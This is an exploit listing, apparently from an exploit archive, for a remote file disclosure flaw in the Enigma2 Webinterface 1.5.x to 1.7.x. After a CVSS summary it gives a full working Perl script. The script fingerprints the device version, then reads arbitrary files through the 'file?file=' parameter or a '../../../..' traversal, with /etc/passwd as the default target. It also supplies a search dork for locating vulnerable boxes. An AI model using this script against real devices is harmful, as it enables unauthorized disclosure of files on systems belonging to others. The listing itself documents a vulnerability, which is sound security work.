Enigma2 Webinterface 1.7.x 1.6.x 1.5.x (linux) Remote File Disclosure

Credit: Todor Donev
Risk: High
Local: No
Remote: Yes

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

#!/usr/bin/perl # # Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote root file disclosure exploit ## # Author: Todor Donev # Email me: todor.donev@@gmail.com # Platform: Linux # Type: remote ## # Gewgle Dork: "Enigma2 movielist" filetype:rss ## # # Enigma2 is a framebuffer-based zapping application (GUI) for linux. # It's targeted to real set-top-boxes, but would also work on regular PCs. # Enigma2 is based on the Python programming language with a backend # written in C++. It uses the [LinuxTV DVB API], which is part of a standard linux kernel. # # Enigma2 can also be controlled via an Enigma2:WebInterface. ## # Thanks to Tsvetelina Emirska !! ## use LWP::Simple; $t = $ARGV[0]; if(! $t) {usg();} $d = $ARGV[1]; if(! $d) {$d = "/etc/passwd";} my $r = get("http://$t/web/about") or exit; print "[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n"; print "[+] Target: $t\n"; if ($r =~ m/<e2webifversion>(.*)<\/e2webifversion>/g){ print "[+] Image Version: $1\n"; } if ($r =~ (m/1.6.0|1.6.1|1.6.2|1.6.3|1.6.4|1.6.5|1.6.6|1.6.7|1.6.8|1.6rc3|1.7.0/i)){ print "[+] Exploiting Enigma2 via type1 (file?file=$d)\n"; result(exploit1()); } if ($r =~ (m/1.5rc1|1.5beta4/i)){ print "[+] Exploiting Enigma2 via type2 (file/?file=../../../..$d)\n"; result(exploit2()); } sub usg{ print "\n[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n"; print "[+] Usage: perl enigma2.pl <victim> </path/file>\n"; exit; } sub exploit1{ my $x = get("http://$t/file?file=$d"); } sub exploit2{ my $x = get("http://$t/file/?file=../../../..$d"); } sub result{ my $x= shift; while(defined $x){ print "$x\n"; print "[+] I got it 4 cheap.. =)\n"; exit; }}

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